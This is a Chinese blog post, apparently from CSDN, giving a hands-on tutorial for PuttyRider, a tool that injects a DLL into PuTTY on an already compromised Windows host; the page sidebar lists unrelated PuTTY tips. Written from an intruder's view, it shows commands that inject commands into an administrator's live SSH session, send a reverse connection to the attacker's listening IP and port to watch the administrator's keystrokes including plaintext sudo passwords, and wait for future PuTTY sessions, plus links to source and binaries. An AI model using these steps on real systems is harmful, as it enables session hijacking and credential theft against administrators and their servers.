Putty的噩梦——渗透工具PuttyRider使用心得分享

最新推荐文章于 2024-04-27 10:08:05 发布
最新推荐文章于 2024-04-27 10:08:05 发布
阅读量612 收藏 1
点赞数
分类专栏: 安全开发 实战篇 文章标签: putty的噩梦 渗透pr工具的使用心得 PuttyRider
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/92661943
版权

在这里插入图片描述
我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的。该工具主要是 针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势。我依次演示该工具的三种利用场景

1.当你远程控制对方主机的时候,管理员正好用putty连接着远程主机

这种情景,我们只要直接注入命令到当前的putty进程,就可以利用,非常简单,缺点是没有回显。
在这里插入图片描述
使用puttyRider.exe –l 查看当前进程中putty正在连接的远程主机信息,这里不光能得到远程主机的IP地址和putty进程号,还能在Injected列看到当前是NO,说明我们还没有进程注入。
在这里插入图片描述
我 们使用puttyrider.exe –p 0 –f –c ifconfig,就把ifconfig命令注入到当前的putty会话了,就达到远程命令执行的目的了。再次puttyRider.exe –l 看一下,发现injected列是yes了,说明我们注入进程成功了。
在这里插入图片描述
2.使用反弹的方式实时看管理员的输入

除 了利用第一种方法直接注入命令,我们还可以反弹出来,实时看到对方管理员在putty里的输入,即使管理输入sudo这种命令,我们也能够看到他输入的明 文密码。但是这种利用的前提是,对方管理员正在用PUTTY连接的主机可以反弹到你监听的IP地址,防火墙限制的不是很严。
在这里插入图片描述
Puttyrider.exe –p 0 –r 我监听的IP:端口

执行后,我们就可以看到结果了
在这里插入图片描述
3.我运气不这么好,对方管理员当前没有正在使用PUTTY管理远程主机

这种情况应该最常见了,软件作者也考虑到了,给我们提供了-w参数,他会让puttyrider后台监视新起来的进程,然后反弹到我们的主机,也能实时的看到对方的操作哦,包括输入的账号
在这里插入图片描述
Puttyrider.exe –w –r 我监听的IP:端口号

当执行完这个命令后,只要管理员下次再次开启PUTTY的时候,我们就能在监听的9999端口看到她的SHELL了
在这里插入图片描述
最后如果想研究工具细节的童鞋,可以在

https://codeload.github.com/seastorm/PuttyRider/zip/master下载源码,深入学习 :)

编译好的二进制文件可以在

https://github.com/seastorm/PuttyRider/releases/download/0.1/PuttyRider-bin.zip下载

Coisini、
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Putty使用技巧
BRAVE MAN的博客
12-02 7084
PuTTY的选择、复制、粘贴这些操作都是通过鼠标来完成的。 在 Window-〉Selection 这里可以设置复制和粘贴的方式。 默认的 Action of mouse buttons (鼠标按键的功能)的选项是 Compromise,这种方式下选中有两种方式,一是直接用鼠标左键拖拉选中就可以了,二是用鼠标中键单击选中区域的开头,用滚动条拖拉到期望选中区域的末尾,再用鼠标中键单击,就可...
远程登录Linux的工具——PuTTY
09-29
lv_0_20220928134553.mp4
AbsoluteTelnet相比PuTTY的优点、缺点
weixin_34268310的博客
11-20 429
2019独角兽企业重金招聘Python工程师标准>>> ...
推荐项目:PuttyRider - SSH/Telnet 客户端增强工具
gitblog_00057的博客
04-27 398
推荐项目:PuttyRider - SSH/Telnet 客户端增强工具 项目地址:https://gitcode.com/seastorm/PuttyRider 项目简介 PuttyRider 是一个基于 PuTTY 的增强版 SSH 和 Telnet 客户端,它为开发者和系统管理员提供了一个更高效、更直观的方式来管理远程服务器。这款开源软件由 seastorm 开发并维护,其目标是通过集成一些...
Putty工具总结
lanSeFangZhou的博客
10-10 6687
用处 PuTTY是一个Telnet、SSH、rlogin、纯TCP以及串行接口连接软件。较早的版本仅支持Windows平台,在最近的版本中开始支持各类Unix平台,并打算移植至Mac OS X上。除了官方版本外,有许多第三方的团体或个人将PuTTY移植到其他平台上,像是以Symbian为基础的移动电话。PuTTY为一开放源代码软件,主要由Simon Tatham维护,使用MIT licence授权...
Linux远程连接工具——Putty
12-05
Linux远程连接工具Putty是一款广泛使用的开源软件,主要用于Windows系统用户连接到运行各种类型Unix和Linux操作系统的远程服务器。这款轻量级的应用程序提供了一种安全的终端模拟器,允许用户通过SSH(Secure Shell...
使用Putty管理Linux系统——显示图形界面.pdf
09-06
使用Putty管理Linux系统——显示图形界面 在Linux系统管理中,使用Putty管理Linux系统是非常常见的,Putty是一个功能强大且易于使用的SSH客户端工具。但是,Putty默认情况下不能显示远程图形界面,需要借助其他工具...
使用Putty管理Linux系统——无密码登录.pdf
09-06
总的来说,通过合理配置和工具配合,我们可以使用Putty在Windows环境下高效、安全地管理和操作远程Linux系统,即使涉及图形界面的操作也能轻松应对。这一技巧对于提高IT运维的效率和安全性具有重要意义。
中兴刷机工具putty
02-26
"中兴刷机工具putty" 是一个专为中兴设备设计的远程访问软件,它基于PuTTY,一个广泛使用的开源终端模拟器、串行到网络的转换器和SSH客户端。PuTTY是一个强大的工具,允许用户通过Secure Shell (SSH)、Telnet、...
putty使用(总结)
weixin_43623880的博客
03-02 4070
putty的总结(不断更新) putty的下载、使用、连接、文件上传等 文章不断更新
渗透工具使用技巧
weixin_41820920的博客
06-10 6705
本文章为转载的一篇文章 最好的 NMAP 扫描策略 适用所有大小网络最好的 nmap 扫描策略 主机发现,生成存活主机列表 $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep “Status: Up” Discovery.gnmap | cut -f 2 -d ’ ’ > LiveHosts.txt 端口发现,...
使用Putty进行ssh登录,修改ubuntu/linux默认端口
衡与墨的博客
01-02 4261
putty是一款十分经典的ssh登录工具,它小巧又功能齐全。网络上很容易就能下载到。 首先输入你的云服务器公网IP,这里端口是默认的22,不需要修改 然后点击open,会跳出新的页面 翻译:当前连接的主机的密钥与原来的不匹配,可能会存在安全隐患。询问是否要更新Putty的缓存并继续连接。 选择确定: 输入用户名,默认一般是ubuntu,再输入密码,回车登录成功: 然后就可以进行常规的lin...
渗透测试工具实战使用技巧合集
zkaqlaoniao的博客
10-27 6788
公众号:黑客菌 分享更多技术文章,欢迎关注一起探讨学习 本文在编译原作者内容的基础上,补充增加了工具的下载安装地址及一些工具的补充学习资料,便于大家进行横向的拓展学习。如有不恰当之处,欢迎大家在评论区指正 1.NMAP Nmap是一款枚举和测试网络的强大工具,有主机探测、端口扫描、版本检测、系统检测以及支持探测脚本编写等功能。 Nmap下载安装地址:https://nmap.org/download.html#purpleheader 漏洞扫描 cd /usr/shar...
putty 背景透明度设置及使用技巧
LANGZI7758521的专栏
05-18 7264
Putty 已经很长时间了,但一直被一个问题困扰,有时候是懒得去弄,反正也不怎么碍事,今天小研究了下,把这个问题解决了,心里也舒服了。   Putty是一个免费小巧的Win32平台下的telnet,rlogin和ssh客户端。 它的主程序不到1M, 是完全免费的telnet和ssh客户端工具。 而且无需安装,下载后在桌面建个快捷方式就行 。 Putty官网的下载地址: http
实现windows和linux互传文件
weixin_30824277的博客
01-12 133
尝试从windows xp向ubuntu11.10传文件 ubuntu使用的是sshwindows使用的是putty和其附带的pscp 首先配置ubuntu: 1.先使用netstat -tl或service ssh status查看ssh服务是否开启,如果没有开启,用service ssh restart开启,如果没有安装,使用sudo apt-get install openssh-se...
PUTTY的配置保存&颜色修改
mi2006的专栏
01-24 1073
putty相对securecrt要小巧的很多,又免费,唯一缺点就是多会话窗口管理很不舒服。即便有很多人试图开发可视化的扩展,仍然要比securecrt弱N个等级。但是说到绿色便携性putty是不二选择,无论在什么条件下,都能快速使用起来。 但是putty的配置信息存储在注册表中,这个设定确实影响了其便携性,最好的方法就是将其默认配置的注册表导出,在需要的地方导入即可。简单的可以用批处理实现。 ...
putty使用教程(总结)
热门推荐
weixin_40705360的博客
01-16 2万+
putty使用教程(总结) 最近开始使用putty,在网络上看到一份很不错的教程,共享一下:putty使用方法,中文教程序言 大致内容罗列如下: 最简单的使用,登录 SSH 主机 中文乱码的处理 PuTTY 常用配置的说明 复制、粘贴 保存会话 注销 自动登录用户名 自动设置环境变量 设置代理服务器 自动执行命令 备份、删除 PuTTY 的设置 PuT...
putty 工具使用AT命令
最新发布
06-19
Putty是一个流行的开源终端仿真程序,用于连接基于Unix或Windows系统的远程服务器。在Putty中,你可以使用AT(Automatic Telnet)命令来执行简单的脚本或自动化任务,尤其是在Linux系统中,AT命令常用于计划执行一些定时任务。 以下是使用Putty通过AT命令的基本步骤: 1. **启动Putty**:打开Putty,输入目标服务器的IP地址或主机名,然后点击“Open”。 2. **连接到服务器**:登录后,你会看到一个命令行界面(TTY)。 3. **启用本地AT功能**:在命令行中,键入`atq`检查当前是否有排队的任务,如果没有,输入`at`开始一个新的命令行解释器,这会进入一个模式,让你可以输入AT命令。 4. **编写AT命令**:在AT命令解释器中,你可以像在bash或其他shell中一样输入命令。例如,`at now +10 minutes -f /path/to/your/script.sh` 将在10分钟后执行指定的shell脚本。 5. **保存并执行命令**:完成AT命令后,按回车键提交,然后键入`q`退出AT命令解释器。 6. **查看任务日程**:如果你想查看已经安排的任务,可以使用`at -l`命令,或者在AT命令解释器中输入`atq`查看。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值